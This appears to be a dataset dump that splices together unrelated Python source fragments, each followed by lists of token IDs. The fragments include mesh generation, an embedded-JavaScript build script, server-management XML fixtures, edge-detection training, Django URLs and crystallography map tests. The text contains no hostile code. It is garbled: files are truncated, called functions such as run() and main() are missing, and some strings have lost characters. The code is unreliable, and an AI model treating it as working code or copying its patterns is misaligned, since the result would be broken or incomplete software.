"""Subdivided icosahedral mesh generation""" from __future__ import print_function import numpy as np # following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html # hierarchy: # Icosphere -> Triangle -> Point def calculate_npts(level): n = 2**level return 2 + 10 * n**2 def calculate_nfaces(level): n = 2**level return 20 * n**2 def cart2geo(x, y, z): """convert x y z cartesian coordinates to latitude longitude radius xyz is a numpy array, a right handed co-ordinate system is assumed with -- x-axis going through the equator at 0 degrees longitude -- y-axis going through the equator at 90 degrees longitude -- z-axis going through the north pole.""" r = np.sqrt(x**2 + y**2 + z**2) lon = np.rad2deg(np.arctan2(y,x)) lat = np.rad2deg(np.arcsin(z/r)) return lat, lon, r def geo2cart(lat, lon, r): """convert latitude longitude radius to x y z cartesian coordinates xyz is a numpy array, a right handed co-ordinate system is assumed with -- x-axis going through the equator at 0 degrees longitude -- y-axis going through the equator at 90 degrees longitude -- z-axis going through the north pole.""" x = r * np.cos(lon) * np.cos(lat) y = r * np.sin(lon) * np.cos(lat) z = r * np.sin(lat) return x, y, z # def xyzToLatLonR(xyz): # trans = np.array([np.])
[ 37811, 7004, 7146, 1384, 14158, 8546, 21962, 19609, 5270, 37811, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 299, 32152, 355, 45941, 198, 198, 2, 1708, 25, 2638, 1378, 14036, 13, 49078, 2093, 993, 1754, 13, 785, 14, ...
2.429519
603
# Resolve the problem!! import string import random SYMBOLS = list('!"#$%&\'()*+,-./:;?@[]^_`{|}~') if __name__ == '__main__': run()
[ 2, 1874, 6442, 262, 1917, 3228, 198, 11748, 4731, 198, 11748, 4738, 198, 198, 23060, 10744, 3535, 50, 796, 1351, 10786, 2474, 29953, 4, 5, 43054, 3419, 9, 10, 12095, 19571, 25, 26, 30, 31, 21737, 61, 62, 63, 90, 91, 92, 93, 11537,...
2.21875
64
#!/usr/bin/env python # Copyright JS Foundation and other contributors, http://js.foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import fnmatch import os def build_soft_links(project_path, jerry_path): """ Creates soft links into the @project_path. """ if not os.path.exists(project_path): os.makedirs(project_path) links = [ { # arc 'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'), 'link_name': 'arc' }, { # include 'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'), 'link_name': 'include' }, { # quark 'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'), 'link_name': 'quark' }, { # quark/jerryscript 'src': jerry_path, 'link_name': os.path.join('quark', 'jerryscript') } ] for link in links: src = os.path.join(jerry_path, link['src']) link_name = os.path.join(project_path, link['link_name']) if not os.path.islink(link_name): os.symlink(src, link_name) print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name)) def find_sources(root_dir, sub_dir): """ Find .c and .S files inside the @root_dir/@sub_dir directory. Note: the returned paths will be relative to the @root_dir directory. 
""" src_dir = os.path.join(root_dir, sub_dir) matches = [] for root, dirnames, filenames in os.walk(src_dir): for filename in fnmatch.filter(filenames, '*.[c|S]'): file_path = os.path.join(root, filename) relative_path = os.path.relpath(file_path, root_dir) matches.append(relative_path) return matches def build_jerry_data(jerry_path): """ Build up a dictionary which contains the following items: - sources: list of JerryScript sources which should be built. - dirs: list of JerryScript dirs used. - cflags: CFLAGS for the build. """ jerry_sources = [] jerry_dirs = set() for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]: for file in find_sources(os.path.normpath(jerry_path), sub_dir): path = os.path.join('jerryscript', file) jerry_sources.append(path) jerry_dirs.add(os.path.split(path)[0]) jerry_cflags = [ '-DJERRY_GLOBAL_HEAP_SIZE=10', '-DJERRY_NDEBUG', '-DJERRY_DISABLE_HEAVY_DEBUG', '-DJERRY_BUILTIN_NUMBER=0', '-DJERRY_BUILTIN_STRING=0', '-DJERRY_BUILTIN_BOOLEAN=0', #'-DJERRY_BUILTIN_ERRORS=0', '-DJERRY_BUILTIN_ARRAY=0', '-DJERRY_BUILTIN_MATH=0', '-DJERRY_BUILTIN_JSON=0', '-DJERRY_BUILTIN_DATE=0', '-DJERRY_BUILTIN_REGEXP=0', '-DJERRY_BUILTIN_ANNEXB=0', '-DJERRY_ESNEXT=0', '-DJERRY_LCACHE=0', '-DJERRY_PROPERTY_HASHMAP=0', ] return { 'sources': jerry_sources, 'dirs': jerry_dirs, 'cflags': jerry_cflags, } def write_file(path, content): """ Writes @content into the file at specified by the @path. """ norm_path = os.path.normpath(path) with open(norm_path, "w+") as f: f.write(content) print("Wrote file '{0}'".format(norm_path)) def build_obj_y(source_list): """ Build obj-y additions from the @source_list. Note: the input sources should have their file extensions. """ return '\n'.join(['obj-y += {0}.o'.format(os.path.splitext(fname)[0]) for fname in source_list]) def build_cflags_y(cflags_list): """ Build cflags-y additions from the @cflags_list. Note: the input sources should have their file extensions. 
""" return '\n'.join(['cflags-y += {0}'.format(cflag) for cflag in cflags_list]) def build_mkdir(dir_list): """ Build mkdir calls for each dir in the @dir_list. """ return '\n'.join(['\t$(AT)mkdir -p {0}'.format(os.path.join('$(OUT_SRC)', path)) for path in dir_list]) def create_root_kbuild(project_path): """ Creates @project_path/Kbuild.mk file. """ root_kbuild_path = os.path.join(project_path, 'Kbuild.mk') root_kbuild_content = ''' obj-$(CONFIG_QUARK_SE_ARC) += arc/ obj-$(CONFIG_QUARK_SE_QUARK) += quark/ ''' write_file(root_kbuild_path, root_kbuild_content) def create_root_makefile(project_path): """ Creates @project_path/Makefile file. """ root_makefile_path = os.path.join(project_path, 'Makefile') root_makefile_content = ''' THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST)))) T := $(abspath $(THIS_DIR)/../..) PROJECT := {project_name} BOARD := curie_101 ifeq ($(filter curie_101, $(BOARD)),) $(error The curie jerry sample application can only run on the curie_101 Board) endif BUILDVARIANT ?= debug quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig # Optional: set the default version VERSION_MAJOR := 1 VERSION_MINOR := 0 VERSION_PATCH := 0 include $(T)/build/project.mk '''.format(project_name=project_name) write_file(root_makefile_path, root_makefile_content) def create_arc_kbuild(project_path): """ Creates @project_path/arc/Kbuild.mk file. """ arc_path = os.path.join(project_path, 'arc') arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk') arc_sources = find_sources(arc_path, '.') arc_kbuild_content = build_obj_y(arc_sources) write_file(arc_kbuild_path, arc_kbuild_content) def create_quark_kbuild(project_path, jerry_path): """ Creates @project_path/quark/Kbuild.mk file. 
""" quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk') # Extract a few JerryScript related data jerry_data = build_jerry_data(jerry_path) jerry_objects = build_obj_y(jerry_data['sources']) jerry_defines = jerry_data['cflags'] jerry_build_dirs = build_mkdir(jerry_data['dirs']) quark_include_paths = [ 'include', 'jerryscript', os.path.join('jerryscript', 'jerry-math', 'include'), os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include') ] + list(jerry_data['dirs']) quark_includes = [ '-Wno-error', ] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths] quark_cflags = build_cflags_y(jerry_defines + quark_includes) quark_kbuild_content = ''' {cflags} obj-y += main.o {objects} build_dirs: {dirs} $(OUT_SRC): build_dirs '''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs) write_file(quark_kbuild_path, quark_kbuild_content) if __name__ == '__main__': import sys if len(sys.argv) != 2: print('Usage:') print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0])) sys.exit(1) project_name = 'curie_bsp_jerry' file_dir = os.path.dirname(os.path.abspath(__file__)) jerry_path = os.path.join(file_dir, "..", "..", "..") curie_path = os.path.join(os.getcwd(), sys.argv[1]) main(curie_path, project_name, jerry_path)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 26755, 5693, 290, 584, 20420, 11, 2638, 1378, 8457, 13, 42526, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198...
2.277516
3,398
from math import sqrt import emoji num = int(input("Digite um nmero: ")) raiz = sqrt(num) print("A raiz do nmero {0} {1:.2f}.".format(num, raiz)) print(emoji.emojize("Hello World! :earth_americas:", use_aliases=True))
[ 6738, 10688, 1330, 19862, 17034, 198, 11748, 44805, 198, 22510, 796, 493, 7, 15414, 7203, 19511, 578, 23781, 299, 647, 78, 25, 366, 4008, 198, 430, 528, 796, 19862, 17034, 7, 22510, 8, 198, 4798, 7203, 32, 2179, 528, 466, 299, 647, ...
2.406593
91
macs_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetHostMacAddressesResponse</wsa:Action><wsa:RelatesTo>dt:1348742659504</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:111efb9a-f7d8-4977-8472-bcad40212a71</wsa:MessageID></s:Header><s:Body><GetHostMacAddressesResponse><HostMACaddress><HostMaddr><Description>Host Ethernet MAC Address 1</Description><Address>6E:F3:DD:E5:96:40</Address></HostMaddr><HostMaddr><Description>Host Ethernet MAC Address 2</Description><Address>6E:F3:DD:E5:96:42</Address></HostMaddr></HostMACaddress></GetHostMacAddressesResponse></s:Body></s:Envelope> ''' memory_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetMemoryInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348742659500</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:dc560696-2ba4-4917-b7e7-1aac1983b727</wsa:MessageID></s:Header><s:Body><GetMemoryInfoResponse><Memory><MemoryInfo><Description>DIMM 2</Description><PartNumber>HMT351R7BFR4A-H9</PartNumber><SerialNumber>33b8a62f</SerialNumber><ManufactureDate>4511</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 
3</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>b38aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 6</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>a78aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 9</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>b524042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 11</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>ba24042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 12</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>8e8aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 15</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>7feda482</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 18</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>d924042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo></Memory></GetMemoryInfoResponse></s:Body></s:Envelope> ''' generic_data_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetVitalProductDataResponse</wsa:Action><wsa:RelatesTo>dt:1348742659499</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:e6829941-2510-4b3d-b9f3-61c7be372dfd</wsa:MessageID></s:Header><s:Body><GetVitalProductDataResponse><GetVitalProductDataResponse><MachineLevelVPD><ProductName>System x3550 M3</ProductName><MachineTypeAndModel>794452G</MachineTypeAndModel><SerialNumber>KD55ARA</SerialNumber><UUID>99A4E4A303023961B8E1561E33328996</UUID></MachineLevelVPD><ComponentLevelVPD><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 
2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>01/27/2012:10:28:39</TimeStamp></ComponentActivityLog><VPD><FirmwareName>IMM</FirmwareName><VersionString>YUOOC7E</VersionString><ReleaseDate>09/30/2011</ReleaseDate></VPD><VPD><FirmwareName>UEFI</FirmwareName><VersionString>D6E154A</VersionString><ReleaseDate>09/23/2011</ReleaseDate></VPD><VPD><FirmwareName>DSA</FirmwareName><VersionString>DSYT89P </VersionString><ReleaseDate>10/28/2011</ReleaseDate></VPD></GetVitalProductDataResponse></GetVitalProductDataResponse></s:Body></s:Envelope> ''' sn_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/iBMCControl/GetSPNameSettingsResponse</wsa:Action><wsa:RelatesTo>dt:1348742647137</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:d2ac4b59-9f60-456e-a182-6a077557e4c1</wsa:MessageID></s:Header><s:Body><GetSPNameSettingsResponse><SPName>SN# KD55ARA</SPName></GetSPNameSettingsResponse></s:Body></s:Envelope> ''' processors_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetProcessorInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348757382511</wsa:RelatesTo><wsa:From><wsa:Address>http://rack-605-12-mgmt.dc2/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:9e5ec08d-0fac-449a-80fa-37cc78290a21</wsa:MessageID></s:Header><s:Body><GetProcessorInfoResponse><Processor><ProcessorInfo><Description>Processor 1</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo><ProcessorInfo><Description>Processor 2</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo></Processor></GetProcessorInfoResponse></s:Body></s:Envelope> '''
[ 76, 16436, 62, 26209, 796, 705, 7061, 47934, 19875, 2196, 2625, 16, 13, 15, 13984, 6927, 82, 25, 4834, 1091, 68, 35555, 5907, 25, 82, 2625, 4023, 1378, 2503, 13, 86, 18, 13, 2398, 14, 16088, 14, 2713, 14, 568, 499, 12, 268, 1091, ...
2.55264
3,163
from __future__ import print_function import argparse import os import time, platform import cv2 import torch import torch.optim as optim from torch.utils.data import DataLoader from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info from losses import * from model import DexiNed # from model0C import DexiNed from utils import (image_normalization, save_image_batch_to_disk, visualize_result) IS_LINUX = True if platform.system()=="Linux" else False def parse_args(): """Parse command line arguments.""" parser = argparse.ArgumentParser(description='DexiNed trainer.') parser.add_argument('--choose_test_data', type=int, default=3, help='Already set the dataset for testing choice: 0 - 8') # ----------- test -------0-- TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8 test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX) test_dir = test_inf['data_dir'] is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5 # Training settings TRAIN_DATA = DATASET_NAMES[0] # BIPED=0 train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX) train_dir = train_inf['data_dir'] # Data parameters parser.add_argument('--input_dir', type=str, default=train_dir, help='the path to the directory with the input data.') parser.add_argument('--input_val_dir', type=str, default=test_inf['data_dir'], help='the path to the directory with the input data for validation.') parser.add_argument('--output_dir', type=str, default='checkpoints', help='the path to output the results.') parser.add_argument('--train_data', type=str, choices=DATASET_NAMES, default=TRAIN_DATA, help='Name of the dataset.') parser.add_argument('--test_data', type=str, choices=DATASET_NAMES, default=TEST_DATA, help='Name of the dataset.') parser.add_argument('--test_list', type=str, default=test_inf['test_list'], help='Dataset sample indices list.') parser.add_argument('--train_list', type=str, default=train_inf['train_list'], help='Dataset sample indices list.') 
parser.add_argument('--is_testing',type=bool, default=is_testing, help='Script in testing mode.') parser.add_argument('--double_img', type=bool, default=True, help='True: use same 2 imgs changing channels') # Just for test parser.add_argument('--resume', type=bool, default=False, help='use previous trained data') # Just for test parser.add_argument('--checkpoint_data', type=str, default='14/14_model.pth', help='Checkpoint path from which to restore model weights from.') parser.add_argument('--test_img_width', type=int, default=test_inf['img_width'], help='Image width for testing.') parser.add_argument('--test_img_height', type=int, default=test_inf['img_height'], help='Image height for testing.') parser.add_argument('--res_dir', type=str, default='result', help='Result directory') parser.add_argument('--log_interval_vis', type=int, default=50, help='The number of batches to wait before printing test predictions.') parser.add_argument('--epochs', type=int, default=22, metavar='N', help='Number of training epochs (default: 25).') parser.add_argument('--lr', default=1e-4, type=float, help='Initial learning rate.') parser.add_argument('--wd', type=float, default=1e-4, metavar='WD', help='weight decay (default: 1e-4)') # parser.add_argument('--lr_stepsize', # default=1e4, # type=int, # help='Learning rate step size.') parser.add_argument('--batch_size', type=int, default=8, metavar='B', help='the mini-batch size (default: 8)') parser.add_argument('--workers', default=8, type=int, help='The number of workers for the dataloaders.') parser.add_argument('--tensorboard',type=bool, default=True, help='Use Tensorboard for logging.'), parser.add_argument('--img_width', type=int, default=480, help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480 parser.add_argument('--img_height', type=int, default=480, help='Image height for training.') # BIPED 400 BSDS 352 parser.add_argument('--channel_swap', default=[2, 1, 0], type=int) parser.add_argument('--crop_img', 
default=True, type=bool, help='If true crop training images, else resize images to match image width and height.') parser.add_argument('--mean_pixel_values', default=[103.939,116.779,123.68, 137.86], type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892] args = parser.parse_args() return args def main(args): """Main function.""" print(f"Number of GPU's available: {torch.cuda.device_count()}") print(f"Pytorch version: {torch.__version__}") # Tensorboard summary writer tb_writer = None training_dir = os.path.join(args.output_dir,args.train_data) os.makedirs(training_dir,exist_ok=True) checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data) if args.tensorboard and not args.is_testing: # from tensorboardX import SummaryWriter # previous torch version from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather tb_writer = SummaryWriter(log_dir=training_dir) # Get computing device device = torch.device('cpu' if torch.cuda.device_count() == 0 else 'cuda') # Instantiate model and move it to the computing device model = DexiNed().to(device) # model = nn.DataParallel(model) ini_epoch =0 if not args.is_testing: if args.resume: ini_epoch=17 model.load_state_dict(torch.load(checkpoint_path, map_location=device)) dataset_train = BipedDataset(args.input_dir, img_width=args.img_width, img_height=args.img_height, mean_bgr=args.mean_pixel_values[0:3] if len( args.mean_pixel_values) == 4 else args.mean_pixel_values, train_mode='train', arg=args ) dataloader_train = DataLoader(dataset_train, batch_size=args.batch_size, shuffle=True, num_workers=args.workers) dataset_val = TestDataset(args.input_val_dir, test_data=args.test_data, img_width=args.test_img_width, img_height=args.test_img_height, mean_bgr=args.mean_pixel_values[0:3] if len( args.mean_pixel_values) == 4 else args.mean_pixel_values, test_list=args.test_list, arg=args ) dataloader_val = DataLoader(dataset_val, batch_size=1, shuffle=False, 
num_workers=args.workers) # Testing if args.is_testing: output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data) print(f"output_dir: {output_dir}") if args.double_img: # predict twice an image changing channels, then mix those results testPich(checkpoint_path, dataloader_val, model, device, output_dir, args) else: test(checkpoint_path, dataloader_val, model, device, output_dir, args) return criterion = bdcn_loss2 optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd) # lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize, # gamma=args.lr_gamma) # Main training loop seed=1021 for epoch in range(ini_epoch,args.epochs): if epoch%7==0: seed = seed+1000 np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed(seed) print("------ Random seed applied-------------") # Create output directories output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch)) img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res') os.makedirs(output_dir_epoch,exist_ok=True) os.makedirs(img_test_dir,exist_ok=True) train_one_epoch(epoch, dataloader_train, model, criterion, optimizer, device, args.log_interval_vis, tb_writer, args=args) validate_one_epoch(epoch, dataloader_val, model, device, img_test_dir, arg=args) # Save model after end of every epoch torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(), os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch))) if __name__ == '__main__': args = parse_args() main(args)
[ 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 198, 11748, 1822, 29572, 198, 11748, 28686, 198, 11748, 640, 11, 3859, 198, 198, 11748, 269, 85, 17, 198, 11748, 28034, 198, 11748, 28034, 13, 40085, 355, 6436, 198, 6738, 28034, ...
1.806565
6,276
#!/usr/bin/env python3 # coding=utf-8 # # Copyright (c) 2021 Huawei Device Co., Ltd. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import sys import json import shutil from core.constants import JsTestConst from xdevice import platform_logger LOG = platform_logger("PretreatTargets") ############################################################################## ############################################################################## ############################################################################## ##############################################################################
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 19617, 28, 40477, 12, 23, 198, 198, 2, 198, 2, 15069, 357, 66, 8, 33448, 43208, 16232, 1766, 1539, 12052, 13, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, ...
4.43254
252
from __future__ import absolute_import from django.conf.urls import patterns, url from django_comments.feeds import LatestCommentFeed from custom_comments import views feeds = { 'comments': LatestCommentFeed, } urlpatterns = patterns('', url(r'^post/$', views.custom_submit_comment), url(r'^flag/(\d+)/$', views.custom_flag_comment), url(r'^delete/(\d+)/$', views.custom_delete_comment), url(r'^approve/(\d+)/$', views.custom_approve_comment), url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'), ) urlpatterns += patterns('', (r'^rss/comments/$', LatestCommentFeed()), )
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 198, 6738, 42625, 14208, 13, 10414, 13, 6371, 82, 1330, 7572, 11, 19016, 198, 198, 6738, 42625, 14208, 62, 15944, 13, 12363, 82, 1330, 26603, 21357, 18332, 198, 198, 6738, 2183, 62, ...
2.659919
247
import pandas as pd, numpy as np from sklearn.preprocessing import OneHotEncoder author_int_dict = {'EAP':0,'HPL':1,'MWS':2} if __name__ == '__main__': pass
[ 11748, 19798, 292, 355, 279, 67, 11, 299, 32152, 355, 45941, 201, 198, 6738, 1341, 35720, 13, 3866, 36948, 1330, 1881, 21352, 27195, 12342, 201, 198, 201, 198, 9800, 62, 600, 62, 11600, 796, 1391, 6, 36, 2969, 10354, 15, 4032, 39, 6...
2.328767
73
# pylint: skip-file import sys import os # code to automatically download dataset curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__))) sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path import mxnet as mx import numpy as np import data from scipy.spatial.distance import cdist from sklearn.cluster import KMeans import model from autoencoder import AutoEncoderModel from solver import Solver, Monitor import logging if __name__ == '__main__': logging.basicConfig(level=logging.INFO) mnist_exp(mx.gpu(0))
[ 2, 279, 2645, 600, 25, 14267, 12, 7753, 198, 11748, 25064, 198, 11748, 28686, 198, 2, 2438, 284, 6338, 4321, 27039, 198, 22019, 81, 62, 6978, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 418, 13, 6978, 13, 397, 2777, 776, 7, 418, 13,...
2.78392
199
from __future__ import division from cctbx.array_family import flex from cctbx import xray from cctbx import crystal from cctbx import maptbx from cctbx.maptbx import minimization from libtbx.test_utils import approx_equal import random from cctbx.development import random_structure from cctbx import sgtbx if (1): random.seed(0) flex.set_random_seed(0) def exercise_00(): """ Exercise maptbx.target_and_gradients_diffmap . """ xrs = get_xrs() map_data, f_calc = get_map(xrs=xrs) tg = maptbx.target_and_gradients_diffmap( unit_cell = xrs.unit_cell(), map_target = map_data, map_current = map_data, step = 0.3, sites_frac = xrs.sites_frac()) assert approx_equal(xrs.sites_cart(), [[0,0,0]]) assert approx_equal(tg.target(), 0) assert approx_equal(list(tg.gradients()), [[0,0,0]]) xrs = xrs.translate(x=0.3, y=-0.5, z=0.7) assert approx_equal(xrs.sites_cart(), [[0.3,-0.5,0.7]]) map_current, f_calc = get_map(xrs=xrs) tg = maptbx.target_and_gradients_diffmap( unit_cell = xrs.unit_cell(), map_target = map_data, map_current = map_current, step = 0.3, sites_frac = xrs.sites_frac()) assert tg.target() > 0 for g in tg.gradients(): for g_ in g: assert abs(g_)>0. def exercise_01(d_min=1.0): """ Exercise maptbx.target_and_gradients_diffmap in action: minimization. 
